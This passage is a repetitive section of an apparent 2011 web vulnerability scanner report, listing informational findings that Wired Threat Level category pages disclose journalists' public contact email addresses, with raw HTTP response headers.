Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:30:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.66. http://www.wired.com/threatlevel/category/openleaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/openleaks/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=139
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:30:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.67. http://www.wired.com/threatlevel/category/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/politics/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:27 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=124
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.68. http://www.wired.com/threatlevel/category/porn/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/porn/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:30:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=174
Expires: Wed, 12 Jan 2011 15:34:06 GMT
Date: Wed, 12 Jan 2011 15:31:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.69. http://www.wired.com/threatlevel/category/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/privacy/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
jj@gizmodo.com
john.borland@gmail.com
klp@wired.com
kpoulsen@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=199
Expires: Wed, 12 Jan 2011 15:34:36 GMT
Date: Wed, 12 Jan 2011 15:31:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kpoulsen@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:jj@gizmodo.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.70. http://www.wired.com/threatlevel/category/rfid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/rfid/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
penneth@gmail.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:39 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=103
Expires: Wed, 12 Jan 2011 15:32:59 GMT
Date: Wed, 12 Jan 2011 15:31:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:penneth@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.71. http://www.wired.com/threatlevel/category/riaa-litigation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/riaa-litigation/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=126
Expires: Wed, 12 Jan 2011 15:33:26 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.72. http://www.wired.com/threatlevel/category/rsa-conference/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/rsa-conference/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=138
Expires: Wed, 12 Jan 2011 15:33:38 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.73. http://www.wired.com/threatlevel/category/sexting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/sexting/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=121
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.74. http://www.wired.com/threatlevel/category/spooks-gone-wild/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/spooks-gone-wild/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:40 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=99
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:31:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.75. http://www.wired.com/threatlevel/category/stuxnet/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/stuxnet/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=166
Expires: Wed, 12 Jan 2011 15:34:24 GMT
Date: Wed, 12 Jan 2011 15:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.76. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/sunshine-and-secrecy/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
jj@gizmodo.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel1@wired.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=93
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:31:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:jj@gizmodo.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:threatlevel1@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.77. http://www.wired.com/threatlevel/category/surveillance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/surveillance/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=123
Expires: Wed, 12 Jan 2011 15:33:51 GMT
Date: Wed, 12 Jan 2011 15:31:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.78. http://www.wired.com/threatlevel/category/the-courts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/the-courts/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=113
Expires: Wed, 12 Jan 2011 15:33:42 GMT
Date: Wed, 12 Jan 2011 15:31:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.79. http://www.wired.com/threatlevel/category/the-ridiculous/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/the-ridiculous/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=142
Expires: Wed, 12 Jan 2011 15:34:14 GMT
Date: Wed, 12 Jan 2011 15:31:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
...[SNIP]...

7.80. http://www.wired.com/threatlevel/category/threats/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/threats/

Issue detail

The following email addresses were disclosed in the response:

david_kravets@wired.com
john.borland@gmail.com
klp@wired.com
kzetter@wired.com
ryan@ryansingel.net
ryan_singel@wired.com
shgustin@gmail.com
threatlevel@wired.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=145
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:32:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:ryan@ryansingel.net">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:klp@wired.com">
...[SNIP]...
<a href="mailto:david_kravets@wired.com">
...[SNIP]...
<a href="mailto:kzetter@wired.com">
...[SNIP]...
<a href="mailto:ryan_singel@wired.com">
...[SNIP]...
<a href="mailto:shgustin@gmail.com">
...[SNIP]...
<a href="mailto:john.borland@gmail.com">
...[SNIP]...
<a href="mailto:threatlevel@wired.com">
